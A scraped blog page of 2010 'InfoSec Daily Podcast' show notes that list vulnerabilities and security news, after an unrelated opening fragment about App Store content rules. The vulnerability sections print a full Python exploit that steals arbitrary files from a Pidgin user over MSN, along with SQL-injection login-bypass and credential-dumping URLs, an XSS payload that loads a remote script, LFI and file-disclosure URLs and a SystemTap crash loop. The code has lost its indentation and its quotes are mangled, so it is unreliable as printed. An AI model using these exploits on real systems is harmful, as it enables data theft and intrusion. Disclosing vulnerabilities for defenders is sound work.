Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge–so far, at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.

2010
02.23

Episode 73 – N1H1

Category: Podcast / Tags: no tag / 2 comments

InfoSec Daily Podcast

 
ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a RTO (Retransmission Timeouts) Remote Denial of Service Vulnerability.  Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
  2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
    1- http://www.sample.com/public/backoffice
    2- login with “admin” as user name and ‘or’ as password
  3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
  4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition.  Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
  5. vBseo is subject to a Local File Include vulnerability.  Version 3.1.0 is vulnerable, though other versions my be impacted. Exploit code is availabe: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
  6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and Cross Site Scripting. Google Dork: “Official Portal 2007″ Exploit code is availabe. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser–
    Cross Site Scripting: http://www.sample.com/?fa=<SCRIPT/SRC=”http://site.com/xss.js”>&lt;/SCRIPT>

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desireable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence Atlanta, Georgia, July 11, 2010.  Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques).  Possible topics include but are not limited to the

following:

*  Knowledge Representation and Engineering for Cyber Security

*  Secure Web Services

*  Development of Trusted Software

*  Data Mining and Forensics

*  Automated Vulnerability Analysis

*  Automated Exploit and Attack Generation

*  Automated Alerting and Response

*  Diagnosis and Plan Recognition

*  Automating Security Analyses and Audits

*  Artificial Immune Systems

*  Privacy and Confidentiality

*  Intelligent User Interfaces for Security Applications

*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:

Mark Boddy

Adventium Labs

Minneapolis, USA

mark.boddy@adventiumlabs.org

Stefan Edelkamp

TZI

University Bremen, Germany

edelkamp@tzi.de

Robert P. Goldman

SIFT, LLC

Minneapolis, USA

rpgoldman@sift.info

Program Committee:

Lee Badger (NIST, US)

Bob Balzer (Teknowledge, US)

Mark Boddy (Adventium Labs, US)

Cas Cremers (ETH, Switzerland)

Stefan Edelkamp (U Bremen, G)

Chris Geib (U Edinburgh, GB)

Robert P. Goldman (SIFT, US)

Rachel Greenstadt (Drexel U, US)

Henry Kautz (U of Rochester, US)

Alessio Lomuscio (IC London, GB)

Norbert Pohlmann (IF(IS), G)

Anil Somayaji (Carleton U, CA)

Shannon Spires (Sandia Labs, US)

Tim Strayer (BBN Technologies, US)

Karsten Sohr (TZI Bremen, G)

Dan Thomsen (SIFT and CDA, US)

Luca Vigano (U Verona, I)

Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010

Notification of acceptance: April 15, 2010

Final versions due:         May 4, 2010

Articles should be submitted in pdf format of up to 8 pages in AAAI plain article style are to be submitted to the Easy Chair (https://www.easychair.org/login.cgi?conf=secart10) system by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affilliated with AAAI-10

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands. newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.
News item 4: http://twitter.com/th3j35t3r
Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which unlike a DDoS attack, requires only one low spec machine to implement.
The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site, or any intermediary nodes.

2010
02.22

Episode 72 – http://5z8.info/super-nsfw_qzg

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
    #!/usr/bin/env python
    “”"
    Pidgin MSN <= 2.6.4 file download vulnerability
    Mathieu GASPARD (gaspmat@gmail.com)

    Description:
    Pidgin is a multi-protocol Instant Messenger.

    This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
    The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
    which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.

    Affected versions :
    Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
    Plugin msn-pecan 0.1.0-rc2  (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date

    Plateforms :
    Windows, Linux, Mac

    Fix :
    Fixed in Pidgin 2.6.5
    Update to the latest version : http://www.pidgin.im/download/

    References :
    [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
    [2] http://www.pidgin.im/news/security/?id=42

    Usage :
    You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
    python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]

    Example :
    # python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]

    ***********************************************************

    Pidgin MSN file download vulnerability (CVE-2010-0013)

    Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]

    ***********************************************************

    Please enter the password for the account “foo@hotmail.com”
    Password:
    [+] Connecting to server
    [+] Authentication in progress
    [+] Synchronisation in progress
    [+] OK, all done, ready to proceed
    [+] Sending request for file “../accounts.xml” to “victim@hotmail.com”
    [+] Using session_id 974948028
    Current : 3606, total: 3881  (92%)
    [+] Got an answer from the contact
    —————-
    <?xml version=’1.0′ encoding=’UTF-8′ ?>

    <account version=’1.0′>
    ……..
    “”"

    import warnings
    warnings.simplefilter(“ignore”,DeprecationWarning)
    import os
    import sys
    try:
    import pymsn
    except ImportError:
    print “Pymsn couldn’t be loaded”
    print “On debian-like systems, the package is python-msn”
    sys.exit(-1)
    import gobject
    import logging
    import getpass
    import hashlib
    from optparse import OptionParser
    import signal
    import time

    SERVER_ADDRESS = ‘messenger.hotmail.com’
    SERVER_PORT = 1863
    FD_OUT = sys.stdout
    MAINLOOP = None
    # seconds after which, if we didn’t get an answer, we quit
    TIMEOUT = 5

    global_client = None

    def quit():
    MAINLOOP.quit()
    sys.exit(0)

    def check_if_succeeds():
    # if False, we didn’t get a chunk so we won’t get any file, so we quit
    if global_client.GOT_CONTROL_BLOB == False:
    print “[+] Didn’t get an answer from the client after %d seconds, it’s likely not vulnerable or the file requested doesn’t exist/is not accessible”%TIMEOUT
    print “[+] Exiting”
    global_client.quit()

    # called when we get the result data, after our request
    def handle_answer(object, client):
    print “\n[+] Got an answer from the contact”
    d = object._data
    data = d.read()
    length = len(data)
    FD_OUT.write(data)
    # if we wrote output to stdout, don’t close it
    if FD_OUT != sys.stdout:
    FD_OUT.close()
    print “[+] Wrote %d bytes to file”%length
    client.end = time.time()
    duration = client.end – client.begin
    print “[+] Download lasted %d seconds at %d bytes/s “%(duration,(length/duration))
    client.quit()

    def my_on_chunk_recv(transport, chunk):
    global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
    session_id = chunk.header.session_id
    blob_id = chunk.header.blob_id
    if session_id == global_client.session_id:
    # first blob is control, we “squeeze” it and keep only the second one
    if global_client.GOT_CONTROL_BLOB == False:
    #print “Got Control blob in our connection (session_id : %d, blob_id: %d)”%(session_id, blob_id)
    global_client.GOT_CONTROL_BLOB = True
    else:
    # if connections is complete, session_id is removed from data_blobs so we have to check before accessing it
    if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
    current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
    print “Current : %d, total: %d  (%d%%)\r”%(current_blob.current_size, current_blob.total_size, ((current_blob.current_size*100)/current_blob.total_size)),
    sys.stdout.flush()

    def error_handler(self, error_type, error):
    # __on_user_invitation_failed, probably because contact is offline/invisible
    if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
    error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
    print “[*] ERROR, contact didn’t accept our invite, probably because it is disconnected/invisible”
    quit()
    # __on_message_undelivered, probably because contact is offline/invisible
    if error_type ==  pymsn.event.ConversationErrorType.MESSAGE and \
    error ==  pymsn.event.MessageError.DELIVERY_FAILED:
    print “[*] ERROR, couldn’t send message, probably because contact is disconnected/invisible”
    quit()
    print “[*] Unhandled error, error_type : %d , error : %d”%(error_type, error)
    quit()

    class MyClient(pymsn.Client):
    def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
    # callback to quit
    self.quit = quit
    # victim from whom we request the file
    self.victim = victim
    # just list contacts for this account
    self.list_only = list_only
    # file we request
    self.filename = filename
    # to calculate download duration and speed
    self.begin = 0
    self.end = 0
    # session_id of the connection to retrieve the file
    self.session_id = 0
    # have we already seen the “control blob” for this connection
    self.GOT_CONTROL_BLOB = False
    pymsn.Client.__init__(self, server)
    # REALLY REALLY HACKISH
    # if contact is disconnected/invisible, a “NotImplementedError” exception is raised
    # and it can’t be caught AFAIK so it needs to be redefined here
    # handler_class should be SwitchboardClient
    for handler_class, extra_args in self._switchboard_manager._handlers_class:
    handler_class._on_error = error_handler

    class MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
    def __compute_data_hash(self, data):
    digest = hashlib.sha1()
    data.seek(0, 0)
    read_data = data.read(1024)
    while len(read_data) > 0:
    digest.update(read_data)
    read_data = data.read(1024)
    data.seek(0, 0)
    return digest.digest()

    # need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because
    # the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)
    def _outgoing_session_transfer_completed(self, session, data):
    handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
    msn_object._data_sha = self.__compute_data_hash(data)
    super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)

    class ClientEventHandler(pymsn.event.ClientEventInterface):

    def on_client_error(self, error_type, error):
    if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
    print “[+] Authentication failed, bad login/password”
    self._client.quit()
    else:
    print “[*] ERROR :”, error_type, ” ->”, error

    def on_client_state_changed(self, state):
    #print “State changed to %s” % state
    if state == pymsn.client.ClientState.CLOSED:
    print “[+] Connection to server closed”
    self._client.quit()

    if state == pymsn.client.ClientState.CONNECTING:
    if self.current_state != state:
    print “[+] Connecting to server”
    self.current_state = state
    if state == pymsn.client.ClientState.AUTHENTICATING:
    if self.current_state != state:
    print “[+] Authentication in progress”
    self.current_state = state
    if state == pymsn.client.ClientState.SYNCHRONIZING:
    if self.current_state != state:
    print “[+] Synchronisation in progress”
    self.current_state = state

    if state == pymsn.client.ClientState.OPEN:
    print “[+] OK, all done, ready to proceed”
    self._client.profile.presence = pymsn.Presence.INVISIBLE
    contact_dict = {}
    for i in self._client.address_book.contacts:
    contact_dict[i.account] = i
    if self._client.list_only:
    for (k,v) in contact_dict.items():
    print k+” (“+v.display_name+”)”
    self._client.quit()
    else:
    if self._client.victim not in contact_dict.keys():
    print “[*] Error, contact %s not in your contact list”%self._client.victim
    self._client.quit()
    else:
    contact = contact_dict[self._client.victim]
    store = MyMSNObjectStore(self._client)
    object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, ‘AAA=’,’2jmj7l5rSw0yVb/vlWAYkK/YBwk=’)
    print “[+] Sending request for file \”%s\” to \”%s\”"%(self._client.filename, self._client.victim)
    self._client.begin = time.time()
    store.request(object, [handle_answer, self._client])
    # at this moment, we got only one session_id, the one we will use to request the file
    for k in store._outgoing_sessions.keys():
    print “[+] Using session_id %d”%k._id
    self._client.session_id = k._id
    # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
    self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
    self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
    # if no file transfer received from the victim after TIMEOUT seconds, quit
    gobject.timeout_add(TIMEOUT*1000, check_if_succeeds)

    def __init__(self, client):
    self.current_state = None
    pymsn.event.ClientEventInterface.__init__(self, client)

    if __name__ == ‘__main__’:
    print “***********************************************************\n”
    print “Pidgin MSN file download vulnerability (CVE-2010-0013)\n”
    print “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n”
    print “***********************************************************\n”

    usage = “Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] ”
    parser = OptionParser(usage=usage)
    parser.add_option(“-f”, “–file”, dest=”filename”, default=None,
    help=”File requested to remote contact”)
    parser.add_option(“-o”, “–output”, dest=”output_file”, default=None,
    help=”Where to write received file, STDOUT otherelse”)
    parser.add_option(“-a”, “–account”, dest=”account”, default=None,
    help=”MSN account to use”)
    parser.add_option(“-c”, “–contact”, dest=”contact”, default=None,
    help=”Contact to request file from”)
    parser.add_option(“-l”, “–list”, dest=”list_only”, action=”store_true”, default=False,
    help=”Just print contact list for your account and exit”)

    (options, args) = parser.parse_args()
    if not options.filename or not options.account or not options.contact:
    if not (options.account and options.list_only):
    print “Error, parameter missing”
    parser.print_help()
    sys.exit(-1)

    if options.output_file != None:
    try:
    FD_OUT = open(options.output_file,”wb”)
    except Exception,e:
    print “Cannot open file %s (%s)”%(options.output_file, e)
    sys.exit(-1)

    MAINLOOP = gobject.MainLoop()

    def sigterm_cb():
    gobject.idle_add(quit)

    signal.signal(signal.SIGTERM, sigterm_cb)

    logging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug
    server = (SERVER_ADDRESS, SERVER_PORT)
    client = MyClient(server, quit, options.contact, options.filename, options.list_only)
    global_client = client
    client_events_handler = ClientEventHandler(client)
    print “Please enter the password for the account \”%s\”"%options.account
    try:
    passwd = getpass.getpass()
    except KeyboardInterrupt:
    quit()

    login_info = (options.account, passwd)
    client.login(*login_info)
    try:
    MAINLOOP.run()
    except KeyboardInterrupt:
    quit()

  2. vBulletin is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. These issues affect vBulletin 4.0.2; other versions may also be affected. Example URLs:
    http://www.sample.com/upload/calendar.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/faq.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/forum.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/usercp.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/subscription.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/showthread.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/showgroups.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/sendmessage.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/search.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/register.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/profile.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/private.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/online.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/newthread.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/misc.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/memberlist.php?=&gt;”‘&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/member.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/inlinemod.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/index.php/&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
    http://www.sample.com/upload/forumdisplay.php?acuparam=&gt;”&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;
  3. phpBugTracker is subject to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to view local files in the context of the webserver process, which may aid in further attacks. This issue affects phpBugTracker 1.0.1; other versions may be vulnerable as well. Example URL: http://www.sample.com/[path]/attachment.php?filename=./config.php

News Items of Interest:

News item 1:  http://www.allaboutjazz.com/php/news.php?id=50220

A band of hackers who were recently discovered hoarding a trove of account logons pilfered from thousands of companies worldwide are garden-variety cyberthieves.  The gang most likely began by hiring spam specialists to send out e- mail and social- networking posts to lure recipients into clicking on a tainted Web link.   They then used a dated free version of a hacking tool called ZeuS and did nothing to hide their tracks, indicating that “they’re probably amateurs.”

This underscores how deeply cybercriminals — from novices to elite gangs — have now saturated the Internet with infections that allow them to take full control of Windows PCs. Cybergangs slot newly infected PCs, called bots, into networks called botnets. On any given day, 12% to 15% of the 1.6 billion computers connected to the Internet are bots, according to security firm Damballa.

News item 2: http://www.suntimes.com/entertainment/music/2059068,freeallmusic-guvera-music-sites-022010.article

Two new companies are giving consumers a way to download songs for free by watching a few ads. The idea has been tried before but this time it appears it might work, because the startups have found advertisers that are willing to pay around $2 to have a moment of your time.
That means recording companies can get about as much compensation from the free services as they receive from a download on iTunes that costs the consumer $1.29.

“You pay for the song by paying attention to the advertiser,” said Richard Nailling, CEO of FreeAllMusic.com, which launched an invitation-only test of its service in December. “It’s a fair trade of attention for music.”

Both Free All Music and another new free site, Guvera.com, have licensing deals with independent labels and two of the largest recording companies, Universal Music Group and EMI Group PLC. Fans of U2, Black Eyed Peas and Norah Jones should be happy. But admirers of Ke$ha or Sade, both with Sony Music labels, will be out of luck for now.

The new services come after years of falling CD sales. More people are consuming music online but spending far less for it.

In response, recording companies have been licensing songs to an array of Internet businesses that offer songs cheaply or for free — in the hope that these legitimate alternatives can keep people from turning to illegal downloads.

News item 3:  http://www.acunetix.com/blog/websecuritynews/statistics-from-10000-leaked-hotmail-passwords/
An anonymous user posted usernames and passwords of over 10,000 Windows Live Hotmail accounts to a web site called PasteBin. PasteBin is currently down for maintenance but I managed to get a copy of the list, and quickly generated some statistics from these passwords.

Below are the statistics:

  • The list initially contained 10,028 entries.
  • After I’ve cleaned up the list, like removing entries without a password,  I had 9843 valid entries (passwords).
  • There are 8931 (90%) unique passwords in the list.
  • The longest password was 30 chars long: lafaroleratropezoooooooooooooo.
  • The shortest password was 1 char long : )

Top 20 most common passwords:

  1. 123456 – 64
  2. 123456789 – 18
  3. alejandra – 11
  4. 111111 – 10
  5. alberto – 9
  6. tequiero – 9
  7. alejandro – 9
  8. 12345678 – 9
  9. 1234567 – 8
  10. estrella – 7
  11. iloveyou  - 7
  12. daniel  - 7
  13. 000000  - 7
  14. roberto  - 7
  15. 654321  - 6
  16. bonita  - 6
  17. sebastian  - 6
  18. beatriz  - 6
  19. mariposa  - 5
  20. america  - 5

Based on these passwords I think the phishing kit was targeted towards the Latino community.

Password length distribution:

  • 1 chars – 2 – 0 %
  • 2 chars – 4 – 0 %
  • 3 chars – 4 – 0 %
  • 4 chars – 31 – 0 %
  • 5 chars – 49 – 1 %
  • 6 chars – 1946 – 22 %
  • 7 chars – 1254 – 14 %
  • 8 chars – 1838 – 21 %
  • 9 chars – 1091 – 12 %
  • 10 chars – 772 – 9 %
  • 11 chars – 527 – 6 %
  • 12 chars – 431 – 5 %
  • 13 chars – 290 – 3 %
  • 14 chars – 219 – 2 %
  • 15 chars – 157 – 2 %
  • 16 chars – 190 – 2 %
  • 17 chars – 56 – 1 %
  • 18 chars – 17 – 0 %
  • 19 chars – 7 – 0 %
  • 20 chars – 14 – 0 %
  • 21 chars – 10 – 0 %
  • 22 chars – 8 – 0 %
  • 23 chars – 3 – 0 %
  • 24 chars – 3 – 0 %
  • 25 chars – 3 – 0 %
  • 26 chars – 0 – 0 %
  • 27 chars – 3 – 0 %
  • 28 chars – 0 – 0 %
  • 29 chars – 1 – 0 %
  • 30 chars – 1 – 0 %

As you can see from the list above, most of the passwords are between 6 and 9 characters long.  Average password length is 8 characters.

What kind of passwords were in the list? :

  • 3,713 = 42 %; lower alpha passwords : passwords containing only characters from ‘a’ to ‘z’.
    Example : iloveyou
  • 291 = 3 %; mixed case alpha passwords : passwords containing  characters from ‘a’ to ‘z’ and from ‘A’ to ‘Z’.
    Example: ILoveYou
  • 1707 = 19 %; numeric passwords: passwords containing only numbers (‘0′ to ‘9′)
    Example: 123456
  • 2655 = 30 %; mixed alpha and numeric passwords: passwords containing characters from ‘a’-’z’, ‘A’-’Z’ and ‘0′-’9′.
    Example: Iloveyou12
  • 565 = 6 %; mixed alpha + numeric + other characters.
    Example: 1Love You$%@

News item 4: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=223000208
Emerging botnet could redirect users to data-stealing sites, researchers say.  Czech security experts say they have uncovered a global botnet that may be redirecting Web surfers to other sites for the purpose of stealing their data.
Jan Vykopal, head of the security project of Masaryk University, told the Czech news agency CTK earlier this week that the Czech Defense Ministry discovered the botnet during a project called CYBER, in which several agencies have been researching ways to improve the country’s cyber defenses.

The botnet’s creators have dubbed the network “Chuck Norris” after the famous Hollywood actor and martial arts expert.

Researchers told the CTK that the botnet could allow operators to breach sensitive user data, such as access details for bank accounts, email boxes, passwords to various services, social networks, and other personal data.

The botnet could conceivably be used for attacks on well-secured servers, as well, Vykopal said, but the researchers are uncertain of how many devices it has martialed.

News item 5: http://www.eweek.com/c/a/Security/FBI-Investigates-Webcam-Spy-Allegations-Against-School-451724/
The FBI is investigating allegations made against the Lower Merion School District in a lawsuit by the parents of a student. The lawsuit claims school officials used a remote-controlled Webcam to spy on their son, a high school student.

The FBI is reportedly investigating a Pennsylvaniaschool district for possible federal law violations in light of a lawsuit filed by the parents of a high school student.

News item 6:  http://www.youtube.com/watch?v=QoqRR_J9ORc%20rel=
I have a lot of interest in the naughtiness of the web and even if it just so happens that an attractive young woman going by the unusual name of “Numbers Anacker”  (user id Man17782) that has never posted a single item to my site, I might be likely to follow her.  As would more and more folks (some of whom are following her back – presumably because they are intrigued by her photograph).  As the following YouTube video demonstrates, this appears to be an attempt to get people to sign-up for a website that offers to find adults new sexual partners.

News item 7: http://www.shadyurl.com/

Link shortening has become a commonplace on services like Facebook and Twitter. Heck, even Google shortens URLs within its products now. People seem to be getting more used to the idea that shortened URLs, despite not showing you where they lead, are safe. Part of that, is that the companies that are doing the shortening keep blacklists of sites with malware or spyware, to keep people from accidentally visiting sites that will do harm.

Newcomer ShadyURL makes no such claims though. This wonderfully satirical service turns even legitimate URLs into something that even the least tech-savvy friend or family member would know better than to click on. It inserts anything from what appear to be hijacking commands, to profanity and the names of well-known malware. In other words, whomever you send one of these links to is likely to say “there’s no way I’m clicking on that,” even though it’s likely to lead to a safe site.

Here are some of the gems it spit out on some common sites:

Facebook.com became: http://5z8.info/inject_worm_w0x6_open.exe
Twitter.com became: http://5z8.info/hack-outlook_z6t4_warez

2010
02.19

Episode 71 – Illusory Superiority

Category: Podcast / Tags: no tag / Add Comment

InfoSec Daily Podcast

 
ISD Podcast Episode 71 for February 19, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC goto MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting is THIS Saturday, February 20th, at 2pm at the Vortex Midtown.   This month’s topic is “Social Engineering,” and Beau W. will be presenting. We hope to see a big group on Saturday!

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)

April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)

May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. SystemTap is subject to multiple local memory-corruption vulnerabilities. An attacker may exploit these issues to execute arbitrary code with SYSTEM privileges. Failed exploit attempts will result in a denial of service. SystemTap 1.1 is vulnerable; other versions may also be affected.
    #!/bin/bash
    while [ "0" = "0" ] ; do
    HOME=1
    /bin/echo /usr/src/kernels/2.6.18-128.el5-PAE-i686/include/*/*

    cat /proc/slabinfo
    done

